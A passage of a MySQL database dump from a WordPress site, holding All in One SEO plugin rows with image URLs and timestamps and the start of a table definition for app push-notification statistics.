(113,1196,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-more-coming-soon.jpg\"}]','2023-08-13 02:23:13',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:23:13','2023-08-13 02:23:13'),
(114,1213,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-conference.jpg\"}]','2023-08-13 02:23:13',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:23:13','2023-08-13 02:23:13'),
(115,1221,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-blog-and-news.jpg\"}]','2023-08-13 02:23:13',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:23:13','2023-08-13 02:23:13'),
(116,1225,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-digital-agency-1.jpg\"}]','2023-08-13 02:23:13',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:23:13','2023-08-13 02:23:13'),
(117,1234,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2017\\/03\\/l-001-hd.png\"}]','2023-08-13 02:23:13',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:23:13','2023-08-13 02:23:13'),
(118,1235,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2017\\/03\\/l-001.png\"}]','2023-08-13 02:23:13',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:23:13','2023-08-13 02:23:13'),
(119,1243,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-book-store.jpg\"}]','2023-08-13 02:23:13',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:23:13','2023-08-13 02:23:13'),
(120,1267,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-travel.jpg\"}]','2023-08-13 02:23:13',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:23:13','2023-08-13 02:23:13'),
(121,1285,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-pers-cr.jpg\"}]','2023-08-13 02:24:12',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:24:12','2023-08-13 02:24:12'),
(122,1295,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-app-blue.jpg\"}]','2023-08-13 02:24:12',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:24:12','2023-08-13 02:24:12'),
(123,1312,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-corp.jpg\"}]','2023-08-13 02:24:12',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:24:12','2023-08-13 02:24:12'),
(124,1338,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/webdesign-showcase.jpg\"}]','2023-08-13 02:24:12',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:24:12','2023-08-13 02:24:12'),
(125,1340,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/showcase-yoga.jpg\"}]','2023-08-13 02:24:12',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:24:12','2023-08-13 02:24:12'),
(126,1342,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/showcase-oana-photo.jpg\"}]','2023-08-13 02:24:12',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:24:12','2023-08-13 02:24:12'),
(127,1355,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-small-store.jpg\"}]','2023-08-13 02:24:12',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:24:12','2023-08-13 02:24:12'),
(128,1395,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2017\\/11\\/d-agency.jpg\"}]','2023-08-13 02:24:12',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:24:12','2023-08-13 02:24:12'),
(129,1405,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/01\\/d-dental.jpg\"}]','2023-08-13 02:24:12',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:24:12','2023-08-13 02:24:12'),
(130,1410,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/01\\/d-law-firm.jpg\"}]','2023-08-13 02:24:12',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:24:12','2023-08-13 02:24:12'),
(131,1414,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/02\\/showcase-shop.jpg\"}]','2023-08-13 02:25:02',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:25:02','2023-08-13 02:25:02'),
(132,1422,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/02\\/demo-d-a.jpg\"}]','2023-08-13 02:25:02',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:25:02','2023-08-13 02:25:02'),
(133,1845,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/06\\/it-001-hd.png\"}]','2023-08-13 02:25:02',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:25:02','2023-08-13 02:25:02'),
(134,1846,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/06\\/it-001.png\"}]','2023-08-13 02:25:02',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:25:02','2023-08-13 02:25:02'),
(135,1876,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/06\\/trade02.jpg\"}]','2023-08-13 02:25:02',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:25:02','2023-08-13 02:25:02'),
(136,1877,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/06\\/trade03.jpg\"}]','2023-08-13 02:25:02',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:25:02','2023-08-13 02:25:02'),
(137,2192,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/06\\/trade05.jpg\"}]','2023-08-13 02:25:02',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:25:02','2023-08-13 02:25:02'),
(138,1882,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/06\\/trade06.jpg\"}]','2023-08-13 02:25:02',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:25:02','2023-08-13 02:25:02'),
(139,1892,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,'2023-08-13 02:25:02',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:25:02','2023-08-13 02:25:02'),
(140,1896,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/06\\/trade07.jpg\"}]','2023-08-13 02:25:02',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:25:02','2023-08-13 02:25:02');
/*!40000 ALTER TABLE `dnctiavkr_aioseo_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_androapp_stats`
--

DROP TABLE IF EXISTS `dnctiavkr_androapp_stats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_androapp_stats` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` text DEFAULT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `eligible` int(11) DEFAULT 0,
  `ios_eligible` int(11) DEFAULT 0,
  `success` int(11) DEFAULT 0,
  `notRegistered` int(11) DEFAULT 0,
  `mismatchsenderid` int(11) DEFAULT 0,
  `other` int(11) DEFAULT 0,
  `status` varchar(60) DEFAULT 'START',
